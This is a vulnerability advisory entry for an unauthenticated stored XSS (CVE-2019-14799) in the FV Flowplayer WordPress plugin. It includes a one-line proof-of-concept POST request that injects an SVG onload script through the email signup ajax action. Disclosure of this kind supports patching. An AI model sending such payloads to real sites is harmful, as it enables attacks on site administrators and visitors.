FV Flowplayer Video Player < 7.3.14.727 – Unauthenticated Stored XSS | CVE 2019-14799 | Plugin Vulnerabilities

Description

The vulnerable function is exposed to unauthenticated users over `wp_ajax_nopriv_fv_wp_flowplayer_email_signup` ajax hook. It saves anything that user provides in `email` POST parameter.

Proof of Concept

Send POST request to wp-admin/admin-ajax.php with body content:

"action=fv_wp_flowplayer_email_signup&list=1&email=<svg/onload=prompt(1)>@test.com"

The provided email input is then rendered on email export screen.

Affects Plugins

fv-wordpress-flowplayer

Fixed in 7.3.14.727

References

CVE

URL

https://www.webarxsecurity.com/flowplayer-video-player-xss-vulnerability/

URL

https://plugins.trac.wordpress.org/changeset/2087606/fv-wordpress-flowplayer

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WebARX Security

Submitter

WebARX Security

Submitter website

https://www.webarxsecurity.com

Submitter twitter

webarx_security

Verified

No

WPVDB ID

a60da1a3-0509-4409-b8b9-8660be0fc18e

Timeline

Publicly Published

2019-05-20 (about 6 years ago)

Added

2019-05-20 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2024-07-19

Title

WP eStore < 8.5.6 - Reflected XSS in Customer Search

Published

2026-03-03

Title

All-in-One Video Gallery < 4.7.5 - Reflected Cross-Site Scripting via 'vi' Parameter

Published

2023-07-17

Title

MultiParcels Shipping For WooCommerce < 1.15.4 - Reflected XSS

Published

2023-04-18

Title

Button Builder - Buttons X <= 0.8.6 - Contributor+ Stored XSS

Published

2025-09-22

Title

Termageddon: Cookie Consent & Privacy Compliance < 1.8.2 - Authenticated (Contributor+) Stored Cross-Site Scripting